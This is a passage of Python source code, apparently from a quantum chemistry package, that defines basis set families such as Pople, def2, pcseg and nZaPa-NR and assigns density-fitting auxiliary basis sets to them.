basis_sto3g = BasisFamily('STO-3G', zeta=1)
basis_321g = BasisFamily('3-21G', zeta=1)
basisfamily_list.append(basis_sto3g)
basisfamily_list.append(basis_321g)
basis_631g = BasisFamily('6-31G', zeta=2)
basis_631g_d_ = BasisFamily('6-31G(d)', zeta=2)
basis_631g_d_p_ = BasisFamily('6-31G(d,p)', zeta=2)
basis_631gs = BasisFamily('6-31G*', '6-31g_d_', zeta=2)
basis_631gss = BasisFamily('6-31G**', '6-31g_d_p_', zeta=2)
basis_631pg = BasisFamily('6-31+G', zeta=2)
basis_631pg_d_ = BasisFamily('6-31+G(d)', zeta=2)
basis_631pg_d_p_ = BasisFamily('6-31+G(d,p)', zeta=2)
basis_631pgs = BasisFamily('6-31+G*', '6-31pg_d_', zeta=2)
basis_631pgss = BasisFamily('6-31+G**', '6-31pg_d_p_', zeta=2)
basis_631ppg = BasisFamily('6-31++G', zeta=2)
basis_631ppg_d_ = BasisFamily('6-31++G(d)', zeta=2)
basis_631ppg_d_p_ = BasisFamily('6-31++G(d,p)', zeta=2)
basis_631ppgs = BasisFamily('6-31++G*', '6-31ppg_d_', zeta=2)
basis_631ppgss = BasisFamily('6-31++G**', '6-31ppg_d_p_', zeta=2)
basisfamily_list.append(basis_631g)
basisfamily_list.append(basis_631g_d_)
basisfamily_list.append(basis_631g_d_p_)
basisfamily_list.append(basis_631gs)
basisfamily_list.append(basis_631gss)
basisfamily_list.append(basis_631pg)
basisfamily_list.append(basis_631pg_d_)
basisfamily_list.append(basis_631pg_d_p_)
basisfamily_list.append(basis_631pgs)
basisfamily_list.append(basis_631pgss)
basisfamily_list.append(basis_631ppg)
basisfamily_list.append(basis_631ppg_d_)
basisfamily_list.append(basis_631ppg_d_p_)
basisfamily_list.append(basis_631ppgs)
basisfamily_list.append(basis_631ppgss)
basis_6311g = BasisFamily('6-311G', zeta=3)
basis_6311g_d_ = BasisFamily('6-311G(d)', zeta=3)
basis_6311g_d_p_ = BasisFamily('6-311G(d,p)', zeta=3)
basis_6311gs = BasisFamily('6-311G*', '6-311g_d_', zeta=3)
basis_6311gss = BasisFamily('6-311G**', '6-311g_d_p_', zeta=3)
basis_6311g_2d_ = BasisFamily('6-311G(2d)', zeta=3)
basis_6311g_2d_p_ = BasisFamily('6-311G(2d,p)', zeta=3)
basis_6311g_2d_2p_ = BasisFamily('6-311G(2d,2p)', zeta=3)
basis_6311g_2df_ = BasisFamily('6-311G(2df)', zeta=3)
basis_6311g_2df_p_ = BasisFamily('6-311G(2df,p)', zeta=3)
basis_6311g_2df_2p_ = BasisFamily('6-311G(2df,2p)', zeta=3)
basis_6311g_2df_2pd_ = BasisFamily('6-311G(2df,2pd)', zeta=3)
basis_6311g_3df_ = BasisFamily('6-311G(3df)', zeta=3)
basis_6311g_3df_p_ = BasisFamily('6-311G(3df,p)', zeta=3)
basis_6311g_3df_2p_ = BasisFamily('6-311G(3df,2p)', zeta=3)
basis_6311g_3df_2pd_ = BasisFamily('6-311G(3df,2pd)', zeta=3)
basis_6311g_3df_3pd_ = BasisFamily('6-311G(3df,3pd)', zeta=3)
basisfamily_list.append(basis_6311g)
basisfamily_list.append(basis_6311g_d_)
basisfamily_list.append(basis_6311g_d_p_)
basisfamily_list.append(basis_6311gs)
basisfamily_list.append(basis_6311gss)
basisfamily_list.append(basis_6311g_2d_)
basisfamily_list.append(basis_6311g_2d_p_)
basisfamily_list.append(basis_6311g_2d_2p_)
basisfamily_list.append(basis_6311g_2df_)
basisfamily_list.append(basis_6311g_2df_p_)
basisfamily_list.append(basis_6311g_2df_2p_)
basisfamily_list.append(basis_6311g_2df_2pd_)
basisfamily_list.append(basis_6311g_3df_)
basisfamily_list.append(basis_6311g_3df_p_)
basisfamily_list.append(basis_6311g_3df_2p_)
basisfamily_list.append(basis_6311g_3df_2pd_)
basisfamily_list.append(basis_6311g_3df_3pd_)
basis_6311pg = BasisFamily('6-311+G', zeta=3)
basis_6311pg_d_ = BasisFamily('6-311+G(d)', zeta=3)
basis_6311pg_d_p_ = BasisFamily('6-311+G(d,p)', zeta=3)
basis_6311pgs = BasisFamily('6-311+G*', '6-311pg_d_', zeta=3)
basis_6311pgss = BasisFamily('6-311+G**', '6-311pg_d_p_', zeta=3)
basis_6311pg_2d_ = BasisFamily('6-311+G(2d)', zeta=3)
basis_6311pg_2d_p_ = BasisFamily('6-311+G(2d,p)', zeta=3)
basis_6311pg_2d_2p_ = BasisFamily('6-311+G(2d,2p)', zeta=3)
basis_6311pg_2df_ = BasisFamily('6-311+G(2df)', zeta=3)
basis_6311pg_2df_p_ = BasisFamily('6-311+G(2df,p)', zeta=3)
basis_6311pg_2df_2p_ = BasisFamily('6-311+G(2df,2p)', zeta=3)
basis_6311pg_2df_2pd_ = BasisFamily('6-311+G(2df,2pd)', zeta=3)
basis_6311pg_3df_ = BasisFamily('6-311+G(3df)', zeta=3)
basis_6311pg_3df_p_ = BasisFamily('6-311+G(3df,p)', zeta=3)
basis_6311pg_3df_2p_ = BasisFamily('6-311+G(3df,2p)', zeta=3)
basis_6311pg_3df_2pd_ = BasisFamily('6-311+G(3df,2pd)', zeta=3)
basis_6311pg_3df_3pd_ = BasisFamily('6-311+G(3df,3pd)', zeta=3)
basisfamily_list.append(basis_6311pg)
basisfamily_list.append(basis_6311pg_d_)
basisfamily_list.append(basis_6311pg_d_p_)
basisfamily_list.append(basis_6311pgs)
basisfamily_list.append(basis_6311pgss)
basisfamily_list.append(basis_6311pg_2d_)
basisfamily_list.append(basis_6311pg_2d_p_)
basisfamily_list.append(basis_6311pg_2d_2p_)
basisfamily_list.append(basis_6311pg_2df_)
basisfamily_list.append(basis_6311pg_2df_p_)
basisfamily_list.append(basis_6311pg_2df_2p_)
basisfamily_list.append(basis_6311pg_2df_2pd_)
basisfamily_list.append(basis_6311pg_3df_)
basisfamily_list.append(basis_6311pg_3df_p_)
basisfamily_list.append(basis_6311pg_3df_2p_)
basisfamily_list.append(basis_6311pg_3df_2pd_)
basisfamily_list.append(basis_6311pg_3df_3pd_)
basis_6311ppg = BasisFamily('6-311++G', zeta=3)
basis_6311ppg_d_ = BasisFamily('6-311++G(d)', zeta=3)
basis_6311ppg_d_p_ = BasisFamily('6-311++G(d,p)', zeta=3)
basis_6311ppgs = BasisFamily('6-311++G*', '6-311ppg_d_', zeta=3)
basis_6311ppgss = BasisFamily('6-311++G**', '6-311ppg_d_p_', zeta=3)
basis_6311ppg_2d_ = BasisFamily('6-311++G(2d)', zeta=3)
basis_6311ppg_2d_p_ = BasisFamily('6-311++G(2d,p)', zeta=3)
basis_6311ppg_2d_2p_ = BasisFamily('6-311++G(2d,2p)', zeta=3)
basis_6311ppg_2df_ = BasisFamily('6-311++G(2df)', zeta=3)
basis_6311ppg_2df_p_ = BasisFamily('6-311++G(2df,p)', zeta=3)
basis_6311ppg_2df_2p_ = BasisFamily('6-311++G(2df,2p)', zeta=3)
basis_6311ppg_2df_2pd_ = BasisFamily('6-311++G(2df,2pd)', zeta=3)
basis_6311ppg_3df_ = BasisFamily('6-311++G(3df)', zeta=3)
basis_6311ppg_3df_p_ = BasisFamily('6-311++G(3df,p)', zeta=3)
basis_6311ppg_3df_2p_ = BasisFamily('6-311++G(3df,2p)', zeta=3)
basis_6311ppg_3df_2pd_ = BasisFamily('6-311++G(3df,2pd)', zeta=3)
basis_6311ppg_3df_3pd_ = BasisFamily('6-311++G(3df,3pd)', zeta=3)
basisfamily_list.append(basis_6311ppg)
basisfamily_list.append(basis_6311ppg_d_)
basisfamily_list.append(basis_6311ppg_d_p_)
basisfamily_list.append(basis_6311ppgs)
basisfamily_list.append(basis_6311ppgss)
basisfamily_list.append(basis_6311ppg_2d_)
basisfamily_list.append(basis_6311ppg_2d_p_)
basisfamily_list.append(basis_6311ppg_2d_2p_)
basisfamily_list.append(basis_6311ppg_2df_)
basisfamily_list.append(basis_6311ppg_2df_p_)
basisfamily_list.append(basis_6311ppg_2df_2p_)
basisfamily_list.append(basis_6311ppg_2df_2pd_)
basisfamily_list.append(basis_6311ppg_3df_)
basisfamily_list.append(basis_6311ppg_3df_p_)
basisfamily_list.append(basis_6311ppg_3df_2p_)
basisfamily_list.append(basis_6311ppg_3df_2pd_)
basisfamily_list.append(basis_6311ppg_3df_3pd_)
# Ahlrichs
basis_def2sv_p_ = BasisFamily('def2-SV(P)', zeta=2)
basis_def2msvp = BasisFamily('def2-mSVP', zeta=2)
basis_def2svp = BasisFamily('def2-SVP', zeta=2)
basis_def2svpd = BasisFamily('def2-SVPD', zeta=2)
basis_def2tzvp = BasisFamily('def2-TZVP', zeta=3)
basis_def2tzvpd = BasisFamily('def2-TZVPD', zeta=3)
basis_def2tzvpp = BasisFamily('def2-TZVPP', zeta=3)
basis_def2tzvppd = BasisFamily('def2-TZVPPD', zeta=3)
basis_def2qzvp = BasisFamily('def2-QZVP', zeta=4)
basis_def2qzvpd = BasisFamily('def2-QZVPD', zeta=4)
basis_def2qzvpp = BasisFamily('def2-QZVPP', zeta=4)
basis_def2qzvppd = BasisFamily('def2-QZVPPD', zeta=4)
basis_def2sv_p_.add_jfit('def2-universal-JFIT')
basis_def2msvp.add_jfit('def2-universal-JFIT')
basis_def2svp.add_jfit('def2-universal-JFIT')
basis_def2svpd.add_jfit('def2-universal-JFIT')
basis_def2tzvp.add_jfit('def2-universal-JFIT')
basis_def2tzvpd.add_jfit('def2-universal-JFIT')
basis_def2tzvpp.add_jfit('def2-universal-JFIT')
basis_def2tzvppd.add_jfit('def2-universal-JFIT')
basis_def2qzvp.add_jfit('def2-universal-JFIT')
basis_def2qzvpd.add_jfit('def2-universal-JFIT')
basis_def2qzvpp.add_jfit('def2-universal-JFIT')
basis_def2qzvppd.add_jfit('def2-universal-JFIT')
basis_def2sv_p_.add_jkfit('def2-universal-JKFIT')
basis_def2msvp.add_jkfit('def2-universal-JKFIT')
basis_def2svp.add_jkfit('def2-universal-JKFIT')
basis_def2svpd.add_jkfit('def2-universal-JKFIT')
basis_def2tzvp.add_jkfit('def2-universal-JKFIT')
basis_def2tzvpd.add_jkfit('def2-universal-JKFIT')
basis_def2tzvpp.add_jkfit('def2-universal-JKFIT')
basis_def2tzvppd.add_jkfit('def2-universal-JKFIT')
basis_def2qzvp.add_jkfit('def2-universal-JKFIT')
basis_def2qzvpd.add_jkfit('def2-universal-JKFIT')
basis_def2qzvpp.add_jkfit('def2-universal-JKFIT')
basis_def2qzvppd.add_jkfit('def2-universal-JKFIT')
basis_def2sv_p_.add_rifit('def2-SV(P)-RI')
basis_def2msvp.add_rifit('def2-SVP-RI')
basis_def2svp.add_rifit('def2-SVP-RI')
basis_def2svpd.add_rifit('def2-SVPD-RI')
basis_def2tzvp.add_rifit('def2-TZVP-RI')
basis_def2tzvpd.add_rifit('def2-TZVPD-RI')
basis_def2tzvpp.add_rifit('def2-TZVPP-RI')
basis_def2tzvppd.add_rifit('def2-TZVPPD-RI')
basis_def2qzvp.add_rifit('def2-QZVP-RI')
basis_def2qzvpp.add_rifit('def2-QZVPP-RI')
basis_def2qzvppd.add_rifit('def2-QZVPPD-RI')
basisfamily_list.append(basis_def2sv_p_)
basisfamily_list.append(basis_def2msvp)
basisfamily_list.append(basis_def2svp)
basisfamily_list.append(basis_def2svpd)
basisfamily_list.append(basis_def2tzvp)
basisfamily_list.append(basis_def2tzvpd)
basisfamily_list.append(basis_def2tzvpp)
basisfamily_list.append(basis_def2tzvppd)
basisfamily_list.append(basis_def2qzvp)
basisfamily_list.append(basis_def2qzvpd)
basisfamily_list.append(basis_def2qzvpp)
basisfamily_list.append(basis_def2qzvppd)
# Jensen
basis_augpcseg0 = BasisFamily('aug-pcseg-0', zeta=1)
basis_augpcseg1 = BasisFamily('aug-pcseg-1', zeta=2)
basis_augpcseg2 = BasisFamily('aug-pcseg-2', zeta=3)
basis_augpcseg3 = BasisFamily('aug-pcseg-3', zeta=4)
basis_augpcseg4 = BasisFamily('aug-pcseg-4', zeta=5)
basis_augpcsseg0 = BasisFamily('aug-pcSseg-0', zeta=1)
basis_augpcsseg1 = BasisFamily('aug-pcSseg-1', zeta=2)
basis_augpcsseg2 = BasisFamily('aug-pcSseg-2', zeta=3)
basis_augpcsseg3 = BasisFamily('aug-pcSseg-3', zeta=4)
basis_augpcsseg4 = BasisFamily('aug-pcSseg-4', zeta=5)
basis_pcseg0 = BasisFamily('pcseg-0', zeta=1)
basis_pcseg1 = BasisFamily('pcseg-1', zeta=2)
basis_pcseg2 = BasisFamily('pcseg-2', zeta=3)
basis_pcseg3 = BasisFamily('pcseg-3', zeta=4)
basis_pcseg4 = BasisFamily('pcseg-4', zeta=5)
basis_pcsseg0 = BasisFamily('pcSseg-0', zeta=1)
basis_pcsseg1 = BasisFamily('pcSseg-1', zeta=2)
basis_pcsseg2 = BasisFamily('pcSseg-2', zeta=3)
basis_pcsseg3 = BasisFamily('pcSseg-3', zeta=4)
basis_pcsseg4 = BasisFamily('pcSseg-4', zeta=5)
# Here lie practical (non-validated) fitting bases for
# Jensen orbital basis sets
basis_augpcseg0.add_jfit('def2-universal-JFIT')
basis_augpcseg1.add_jfit('def2-universal-JFIT')
basis_augpcseg2.add_jfit('def2-universal-JFIT')
basis_augpcseg3.add_jfit('def2-universal-JFIT')
basis_augpcsseg0.add_jfit('def2-universal-JFIT')
basis_augpcsseg1.add_jfit('def2-universal-JFIT')
basis_augpcsseg2.add_jfit('def2-universal-JFIT')
basis_augpcsseg3.add_jfit('def2-universal-JFIT')
basis_pcseg0.add_jfit('def2-universal-JFIT')
basis_pcseg1.add_jfit('def2-universal-JFIT')
basis_pcseg2.add_jfit('def2-universal-JFIT')
basis_pcseg3.add_jfit('def2-universal-JFIT')
basis_pcsseg0.add_jfit('def2-universal-JFIT')
basis_pcsseg1.add_jfit('def2-universal-JFIT')
basis_pcsseg2.add_jfit('def2-universal-JFIT')
basis_pcsseg3.add_jfit('def2-universal-JFIT')
basis_augpcseg0.add_jkfit('def2-universal-JKFIT')
basis_augpcseg1.add_jkfit('def2-universal-JKFIT')
basis_augpcseg2.add_jkfit('def2-universal-JKFIT')
basis_augpcseg3.add_jkfit('def2-universal-JKFIT')
basis_augpcseg4.add_jkfit('aug-cc-pV5Z-JKFIT')
basis_augpcsseg0.add_jkfit('def2-universal-JKFIT')
basis_augpcsseg1.add_jkfit('def2-universal-JKFIT')
basis_augpcsseg2.add_jkfit('def2-universal-JKFIT')
basis_augpcsseg3.add_jkfit('def2-universal-JKFIT')
basis_augpcsseg4.add_jkfit('aug-cc-pV5Z-JKFIT')
basis_pcseg0.add_jkfit('def2-universal-JKFIT')
basis_pcseg1.add_jkfit('def2-universal-JKFIT')
basis_pcseg2.add_jkfit('def2-universal-JKFIT')
basis_pcseg3.add_jkfit('def2-universal-JKFIT')
basis_pcseg4.add_jkfit('cc-pV5Z-JKFIT')
basis_pcsseg0.add_jkfit('def2-universal-JKFIT')
basis_pcsseg1.add_jkfit('def2-universal-JKFIT')
basis_pcsseg2.add_jkfit('def2-universal-JKFIT')
basis_pcsseg3.add_jkfit('def2-universal-JKFIT')
basis_pcsseg4.add_jkfit('cc-pV5Z-JKFIT')
basis_augpcseg0.add_rifit('def2-SV(P)-RI')
basis_augpcseg1.add_rifit('def2-SVPD-RI')
basis_augpcseg2.add_rifit('def2-TZVPPD-RI')
basis_augpcseg3.add_rifit('def2-QZVPPD-RI')
basis_augpcseg4.add_rifit('aug-cc-pV5Z-RI')
basis_augpcsseg0.add_rifit('def2-SV(P)-RI')
basis_augpcsseg1.add_rifit('def2-SVPD-RI')
basis_augpcsseg2.add_rifit('def2-TZVPPD-RI')
basis_augpcsseg3.add_rifit('def2-QZVPPD-RI')
basis_augpcsseg4.add_rifit('aug-cc-pwCV5Z-RI')
basis_pcseg0.add_rifit('def2-SV(P)-RI')
basis_pcseg1.add_rifit('def2-SVP-RI')
basis_pcseg2.add_rifit('def2-TZVPP-RI')
basis_pcseg3.add_rifit('def2-QZVPP-RI')
basis_pcseg4.add_rifit('cc-pV5Z-RI')
basis_pcsseg0.add_rifit('def2-SV(P)-RI')
basis_pcsseg1.add_rifit('def2-SVP-RI')
basis_pcsseg2.add_rifit('def2-TZVPP-RI')
basis_pcsseg3.add_rifit('def2-QZVPP-RI')
basis_pcsseg4.add_rifit('cc-pwCV5Z-RI')
basisfamily_list.append(basis_augpcseg0)
basisfamily_list.append(basis_augpcseg1)
basisfamily_list.append(basis_augpcseg2)
basisfamily_list.append(basis_augpcseg3)
basisfamily_list.append(basis_augpcseg4)
basisfamily_list.append(basis_augpcsseg0)
basisfamily_list.append(basis_augpcsseg1)
basisfamily_list.append(basis_augpcsseg2)
basisfamily_list.append(basis_augpcsseg3)
basisfamily_list.append(basis_augpcsseg4)
basisfamily_list.append(basis_pcseg0)
basisfamily_list.append(basis_pcseg1)
basisfamily_list.append(basis_pcseg2)
basisfamily_list.append(basis_pcseg3)
basisfamily_list.append(basis_pcseg4)
basisfamily_list.append(basis_pcsseg0)
basisfamily_list.append(basis_pcsseg1)
basisfamily_list.append(basis_pcsseg2)
basisfamily_list.append(basis_pcsseg3)
basisfamily_list.append(basis_pcsseg4)
# Minix
basis_minix = BasisFamily('minix', zeta=2)
basis_minix.add_jfit('def2-universal-JFIT')
basis_minix.add_jkfit('def2-universal-JKFIT')
basis_minix.add_rifit('def2-SVP-RI')
basisfamily_list.append(basis_minix)
# Others
basis_dz = BasisFamily('DZ')
basis_dzp = BasisFamily('DZP')
basis_dzvp = BasisFamily('DZVP')
basis_psi3dzp = BasisFamily('psi3-DZP')
basis_psi3tz2p = BasisFamily('psi3-TZ2P')
basis_psi3tz2pf = BasisFamily('psi3-TZ2PF')
basis_sadlejlpoldl = BasisFamily('sadlej-lpol-dl')
basis_sadlejlpolds = BasisFamily('sadlej-lpol-ds')
basis_sadlejlpolfl = BasisFamily('sadlej-lpol-fl')
basis_sadlejlpolfs = BasisFamily('sadlej-lpol-fs')
basisfamily_list.append(basis_dz)
basisfamily_list.append(basis_dzp)
basisfamily_list.append(basis_dzvp)
basisfamily_list.append(basis_psi3dzp)
basisfamily_list.append(basis_psi3tz2p)
basisfamily_list.append(basis_psi3tz2pf)
basisfamily_list.append(basis_sadlejlpoldl)
basisfamily_list.append(basis_sadlejlpolds)
basisfamily_list.append(basis_sadlejlpolfl)
basisfamily_list.append(basis_sadlejlpolfs)
# Here lie practical (non-validated) fitting bases for
# Pople orbital basis sets
basis_sto3g.add_jkfit('def2-universal-JKFIT')
basis_sto3g.add_rifit('def2-SVP-RIFIT')
basis_321g.add_jkfit('def2-universal-JKFIT')
basis_321g.add_rifit('def2-SVP-RIFIT')
basis_631g.add_jkfit('cc-pvdz-jkfit')
basis_631g_d_.add_jkfit('cc-pvdz-jkfit')
basis_631g_d_p_.add_jkfit('cc-pvdz-jkfit')
basis_631gs.add_jkfit('cc-pvdz-jkfit')
basis_631gss.add_jkfit('cc-pvdz-jkfit')
basis_631g.add_rifit('cc-pvdz-ri')
basis_631g_d_.add_rifit('cc-pvdz-ri')
basis_631g_d_p_.add_rifit('cc-pvdz-ri')
basis_631gs.add_rifit('cc-pvdz-ri')
basis_631gss.add_rifit('cc-pvdz-ri')
basis_631pg.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pg_d_.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pg_d_p_.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pgs.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pgss.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pg.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631pg_d_.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631pg_d_p_.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631pgs.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631pgss.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631ppg.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppg_d_.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppg_d_p_.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppgs.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppgss.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppg.add_rifit('aug-cc-pvdz-ri')
basis_631ppg_d_.add_rifit('aug-cc-pvdz-ri')
basis_631ppg_d_p_.add_rifit('aug-cc-pvdz-ri')
basis_631ppgs.add_rifit('aug-cc-pvdz-ri')
basis_631ppgss.add_rifit('aug-cc-pvdz-ri')
basis_6311g.add_jkfit('cc-pvtz-jkfit')
basis_6311g_d_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_d_p_.add_jkfit('cc-pvtz-jkfit')
basis_6311gs.add_jkfit('cc-pvtz-jkfit')
basis_6311gss.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2d_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2d_p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2d_2p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2df_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2df_p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2df_2p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2df_2pd_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_2p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_2pd_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_3pd_.add_jkfit('cc-pvtz-jkfit')
basis_6311g.add_rifit('cc-pvtz-ri')
basis_6311g_d_.add_rifit('cc-pvtz-ri')
basis_6311g_d_p_.add_rifit('cc-pvtz-ri')
basis_6311gs.add_rifit('cc-pvtz-ri')
basis_6311gss.add_rifit('cc-pvtz-ri')
basis_6311g_2d_.add_rifit('cc-pvtz-ri')
basis_6311g_2d_p_.add_rifit('cc-pvtz-ri')
basis_6311g_2d_2p_.add_rifit('cc-pvtz-ri')
basis_6311g_2df_.add_rifit('cc-pvtz-ri')
basis_6311g_2df_p_.add_rifit('cc-pvtz-ri')
basis_6311g_2df_2p_.add_rifit('cc-pvtz-ri')
basis_6311g_2df_2pd_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_p_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_2p_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_2pd_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_3pd_.add_rifit('cc-pvtz-ri')
basis_6311pg.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_d_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_d_p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pgs.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pgss.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2d_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2d_p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2d_2p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2df_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2df_p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2df_2p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2df_2pd_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_2p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_2pd_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_3pd_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_d_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_d_p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pgs.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pgss.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2d_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2d_p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2d_2p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2df_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2df_p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2df_2p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2df_2pd_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_2p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_2pd_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_3pd_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311ppg.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_d_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_d_p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppgs.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppgss.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2d_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2d_p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2d_2p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2df_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2df_p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2df_2p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2df_2pd_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_2p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_2pd_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_3pd_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_d_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_d_p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppgs.add_rifit('aug-cc-pvtz-ri')
basis_6311ppgss.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2d_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2d_p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2d_2p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2df_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2df_p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2df_2p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2df_2pd_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_2p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_2pd_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_3pd_.add_rifit('aug-cc-pvtz-ri')
# Petersson's nZaPa-NR basis sets
basis_2zapa_nr = BasisFamily('2zapa-nr',zeta=2)
basis_3zapa_nr = BasisFamily('3zapa-nr',zeta=3)
basis_4zapa_nr = BasisFamily('4zapa-nr',zeta=4)
basis_5zapa_nr = BasisFamily('5zapa-nr',zeta=5)
basis_6zapa_nr = BasisFamily('6zapa-nr',zeta=6)
basis_7zapa_nr = BasisFamily('7zapa-nr',zeta=7)
# fitting sets for nZaPa-NR
# Dunnings zeta+1 to be safe, tested on water dimer
# the full aug-JKFIT is possibly too much
#--------SCF-JKFIT error for nZaPa-NR
# results for GS energies of water dimer:
# delta_jk = E_conv - E_DFJK
# ZaPa zeta 2 : delta_jk = -0.000009
# ZaPa zeta 3 : delta_jk = -0.000002
# ZaPa zeta 4 : delta_jk = -0.000002
# ZaPa zeta 5 : delta_jk = -0.000002
# ZaPa zeta 6 : delta_jk = 0.000000
# ZaPa zeta 7 : delta_jk = 0.000000
basis_2zapa_nr.add_jkfit('aug-cc-pvtz-jkfit')
basis_3zapa_nr.add_jkfit('aug-cc-pvqz-jkfit')
basis_4zapa_nr.add_jkfit('aug-cc-pv5z-jkfit')
basis_5zapa_nr.add_jkfit('aug-cc-pv5z-jkfit')
basis_6zapa_nr.add_jkfit('aug-cc-pv6z-ri')
basis_7zapa_nr.add_jkfit('aug-cc-pv6z-ri')
basis_2zapa_nr.add_rifit('aug-cc-pvtz-ri')
basis_3zapa_nr.add_rifit('aug-cc-pvqz-ri')
basis_4zapa_nr.add_rifit('aug-cc-pv5z-ri')
basis_5zapa_nr.add_rifit('aug-cc-pv6z-ri')
basis_6zapa_nr.add_rifit('aug-cc-pv6z-ri')
basis_7zapa_nr.add_rifit('aug-cc-pv6z-ri')
basisfamily_list.append(basis_2zapa_nr)
basisfamily_list.append(basis_3zapa_nr)
basisfamily_list.append(basis_4zapa_nr)
basisfamily_list.append(basis_5zapa_nr)
basisfamily_list.append(basis_6zapa_nr)
